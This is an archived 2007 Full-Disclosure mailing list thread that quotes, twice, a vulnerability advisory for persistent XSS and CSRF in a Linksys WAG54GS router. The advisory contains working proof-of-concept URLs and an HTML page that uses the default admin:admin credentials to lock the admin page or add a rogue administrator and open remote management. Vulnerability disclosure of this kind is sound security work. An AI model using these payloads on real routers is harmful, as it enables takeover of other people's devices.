lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 27 Jun 2007 22:49:25 +0100
From: pagvac <unknown.pentester@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Persistent XSS and CSRF on network appliance
 [subject corrected :) ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml

If you bothered that much you deserve the advisory I guess :-D.

btw, I didn't know google pages have sitemap.xml enabled by default.

So no hash cracking here, just to set things straight.

Joey Mengele wrote:
> After plugging this hash into John The Ripper, I was able to
> reproduce the text of the original advisory. It follows in
> entirety. For those wishing to verify the hash provided by the
> architect, I have also included the advisory in attachment form as
> a convenience for the skeptics who say MD5 can not be reversed.
>
> J
>
> ___ BEGIN LAME CRACKED ADVISORY ___
> Persistent XSS and CSRF and on Wireless-G ADSL Gateway with
> SpeedBooster (WAG54GS)
>
> == Date found ==
>
> 24 June 2007
>
> == Firmware Version ==
>
> V1.00.06
>
> == Description ==
>
>
> There are several persistent XSS vulnerabilities on the
> '/setup.cgi' script.
>
> It is possible to inject JavaScript by assigning a payload like the
> following
> to any of the vulnerable parameters:
>
>> <script>[PAYLOAD]</script>
>
> The vulnerable (non-sanitized) parameters are the following:
>
> 'devname'
> 'snmp_getcomm'
> 'snmp_setcomm'
> 'c4_trap_ip_'
>
> Additionally, all HTTP requests are not tokenized using non-
> predictable values.
> Thus, all requests to the router's HTTP interface are vulnerable to
> Cross-site
> Request Forgeries (CSRF), perhaps by design.
>
> The following is an example of a HTTP request (notice the lack of
> non-predictable tokens):
>
>     POST /setup.cgi HTTP/1.1
>     Authorization: Basic YWRtaW46YWRtaW4=
>
>     mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file
> =Factorydefaults.htm&next_file=index.htm&message=
>
> Although the original request is a POST, we can convert it to a
> GET, so that all posted parameters can be submitted on a single URL.
>
> For example, the previous POST request can be converted to a URL
> such as the following:
>
>     http://admin:admin@....168.1.1/setup.cgi?mtenRestore=Restore+Factor
> y+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_f
> ile=index.htm&message=
>
> By forging administrative requests ("Administration" button on the
> router's HTML menu), an attacker can compromise the router provided
> the
> victim user visits a malicious URL or HTML page.
>
> The attack can only be successfuly if any of the following
> conditions are met:
>
> - the administrator hasn't changed the default credentials
> (admin/admin)
> - the administrator's browser has an active authentication session
> with the router's interface when the attack happens
>   (highly unlikely)
>
>
> == Persistent XSS PoC ==
>
> The following URL creates a DoS condition by making the
> "Administration" page inaccessible since 'history.back()'
> will run everytime the Administration page is visited. Thus the
> administrator won't be able to ever change the
> default credentials unless a hard reset is performed on using the
> router's physical "restart" switch:
>
>     http://admin:admin@....168.1.1/setup.cgi?user_list=1&sysname=admin&
> sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http
> _wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_e
> nable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged=
> yes&h_remote_management=enable&c4_trap_ip_="><script>history.back()<
> /script>&h_snmp_enable=enable&h_upnp_enable=enable&h_wlan_enable=ena
> ble&todo=save&this_file=Administration.htm&next_file=Administration.
> htm&message=
>     http://tinyurl.com/36sjzw
>
>
> == CSRF PoC ==
>
> The following HTML page does the following:
>
> - adds an *additional* administrative account, with a username
> equals to 'attacker' and a password equals to '0wned' (without
> removing original admin account!)
> - enables remote HTTP management over port 1337
> - sets other settings that are inrelevant to this discussion
>
>     <html>
>     <body>
>         <script>
>         // send 2 requests to add an administrative account and enable
> remote management
>         // tries with default credentials and with credentials cached by
> browser (if any)
>    
>         var img = new Image();
>         var img2 = new Image();
>
>         img.src =
> 'http://admin:admin@....168.1.1/setup.cgi?user_list=8&sysname=attack
> er&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&h
> ttp_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wla
> n_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchang
> ed=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable
> &h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Admin
> istration.htm&next_file=Administration.htm&message=';
>         img2.src =
> 'http://192.168.1.1/setup.cgi?user_list=8&sysname=attacker&sysPasswd
> =0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=
> 1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=ena
> ble&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_rem
> ote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enab
> le=enable&h_wlan_enable=enable&todo=save&this_file=Administration.ht
> m&next_file=Administration.htm&message=';
>         </script>
>     </body>
>     </html>
>
> The first URL forges the administrative request using the default
> credentials, so it won't work if default credentials
> have been changed.
>
> The second URL doesn't specify any credentials as an attempt to use
> the browser's cached credentials.
> If the admin user has clicked on "Save password" on the basic
> authentication prompt, most browsers will
> prompt the user to confirm submitting the cached credentials. The
> only situation in which browsers won't
> ask the user to confirm submitting the credentials would be if the
> malicious CSRF page was visited while
> the browser has an active authenticated session with the router's
> HTTP interface (very unlikely).
>
>
> == Additional notes ==
>
> - router reboots after saving settings (requests sent to
> 'setup.cgi')
>
> - all attacks were tested using Internet Explorer 7
>
> - No firmware updates were available at time of testing, only GPL
> code is available:
>
> http://www.linksys.com/servlet/Satellite?c=L_CASupport_C2&childpagen
> ame=US%2FLayout&cid=1166859889040&pagename=Linksys%2FCommon%2FVisito
> rWrapper&lid=8904040638B02&displaypage=download#versiondetail
>
>
> == References ==
>
> http://www.linksys.com/
>
>
> == Credits ==
>
> pagvac [ikwt.com] and Petko Petkov [gnucitizen.org]
> ___ END LAME CRACKED ADVISORY ___
>
> On Wed, 27 Jun 2007 16:29:43 -0400 pagvac
> <unknown.pentester@...il.com> wrote:
>> The file "research.txt" will be provided once the vendor fixes the
>> issues. At that point anyone can check that the hash matches the
>> one
>> included in this post.
>>
>> Thank you.
>>
>> Joey Mengele wrote:
>>> Please provide the original content of research.txt so I can
>> verify
>>> that the hash is correct. I will also need the hash of your
>>> md5sum.exe. Thanks.
>>>
>>> J
>>>
>>> On Wed, 27 Jun 2007 16:02:16 -0400 pagvac
>>> <unknown.pentester@...il.com> wrote:
>>>> The HTTP interface of a network appliance has been researched
>> and
>>>> found to be vulnerable to several persistent XSS and CSRF.
>>>>
>>>> Such research was done by pdp (architect) and myself. We
>> informed
>>>> the
>>>> vendor and will publish the details when a fix is available.
>>>>
>>>> The following is the MD5 hash for the advisory file.
>>>>
>>>> $ md5sum.exe research.txt
>>>> 3db1d71fc3a0eae119617b3b1124206f  *research.txt
>>>>
>>>> Regards,
>>>>
>>>> --
>>>> pagvac
>>>> [http://gnucitizen.org, http://ikwt.com/]
>>> --
>>> Click here for to find products that will help grow your small
>> business.
>> http://tagline.hushmail.com/fc/Ioyw6h4eDJc9UN71zvlsGp4ZGBzvqUZDr59L
>> zooSm6N56gZuYA97Kt/
>>>
>>
>> --
>> pagvac
>> [http://gnucitizen.org, http://ikwt.com/]
>
> --
> Click to make millions by owning your own franchise
> http://tagline.hushmail.com/fc/Ioyw6h4eB8rDoXd3rzWGRyuLVrO8wOmiWFoFiDB4VYIwImlRd0K9S9/
>
> ----------------------------------------------------------------------
>
> Persistent XSS and CSRF and on Wireless-G ADSL Gateway with
SpeedBooster (WAG54GS)
>
> == Date found ==
>
> 24 June 2007
>
> == Firmware Version ==
>
> V1.00.06
>
> == Description ==
>
>
> There are several persistent XSS vulnerabilities on the '/setup.cgi'
script.
>
> It is possible to inject JavaScript by assigning a payload like the
following
> to any of the vulnerable parameters:
>
>> <script>[PAYLOAD]</script>
>
> The vulnerable (non-sanitized) parameters are the following:
>
> 'devname'
> 'snmp_getcomm'
> 'snmp_setcomm'
> 'c4_trap_ip_'
>
> Additionally, all HTTP requests are not tokenized using non-predictable
values.
> Thus, all requests to the router's HTTP interface are vulnerable to
Cross-site
> Request Forgeries (CSRF), perhaps by design.
>
> The following is an example of a HTTP request (notice the lack of
non-predictable tokens):
>
>     POST /setup.cgi HTTP/1.1
>     Authorization: Basic YWRtaW46YWRtaW4=
>
>    
mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_file=index.htm&message=
>
> Although the original request is a POST, we can convert it to a GET, so
that all posted parameters can be submitted on a single URL.
>
> For example, the previous POST request can be converted to a URL such
as the following:
>
>    
http://admin:admin@....168.1.1/setup.cgi?mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_file=index.htm&message=
>
> By forging administrative requests ("Administration" button on the
router's HTML menu), an attacker can compromise the router provided the
> victim user visits a malicious URL or HTML page.
>
> The attack can only be successfuly if any of the following conditions
are met:
>
> - the administrator hasn't changed the default credentials (admin/admin)
> - the administrator's browser has an active authentication session with
the router's interface when the attack happens
>   (highly unlikely)
>
>
> == Persistent XSS PoC ==
>
> The following URL creates a DoS condition by making the
"Administration" page inaccessible since 'history.back()'
> will run everytime the Administration page is visited. Thus the
administrator won't be able to ever change the
> default credentials unless a hard reset is performed on using the
router's physical "restart" switch:
>
>    
http://admin:admin@....168.1.1/setup.cgi?user_list=1&sysname=admin&sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http_wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_="><script>history.back()</script>&h_snmp_enable=enable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=
>     http://tinyurl.com/36sjzw
>
>
> == CSRF PoC ==
>
> The following HTML page does the following:
>
> - adds an *additional* administrative account, with a username equals
to 'attacker' and a password equals to '0wned' (without removing
original admin account!)
> - enables remote HTTP management over port 1337
> - sets other settings that are inrelevant to this discussion
>
>     <html>
>     <body>
>         <script>
>         // send 2 requests to add an administrative account and enable
remote management
>         // tries with default credentials and with credentials cached
by browser (if any)
>    
>         var img = new Image();
>         var img2 = new Image();
>
>         img.src =
'http://admin:admin@....168.1.1/setup.cgi?user_list=8&sysname=attacker&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=';
>         img2.src =
'http://192.168.1.1/setup.cgi?user_list=8&sysname=attacker&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=';
>         </script>
>     </body>
>     </html>
>
> The first URL forges the administrative request using the default
credentials, so it won't work if default credentials
> have been changed.
>
> The second URL doesn't specify any credentials as an attempt to use the
browser's cached credentials.
> If the admin user has clicked on "Save password" on the basic
authentication prompt, most browsers will
> prompt the user to confirm submitting the cached credentials. The only
situation in which browsers won't
> ask the user to confirm submitting the credentials would be if the
malicious CSRF page was visited while
> the browser has an active authenticated session with the router's HTTP
interface (very unlikely).
>
>
> == Additional notes ==
>
> - router reboots after saving settings (requests sent to 'setup.cgi')
>
> - all attacks were tested using Internet Explorer 7
>
> - No firmware updates were available at time of testing, only GPL code
is available:
>
> http://www.linksys.com/servlet/Satellite?c=L_CASupport_C2&childpagename=US%2FLayout&cid=1166859889040&pagename=Linksys%2FCommon%2FVisitorWrapper&lid=8904040638B02&displaypage=download#versiondetail
>
>
> == References ==
>
> http://www.linksys.com/
>
>
> == Credits ==
>
> pagvac [ikwt.com] and Petko Petkov [gnucitizen.org]


- --
pagvac
[http://gnucitizen.org, http://ikwt.com/]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)

iD8DBQFGgttjjXB4hX6OC/cRAjPBAKCHfyKTxufqkA3umJivYkePZr2IxQCfaIPd
/NTsZfC0sSYvWezySDRmtZY=
=2L6c
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ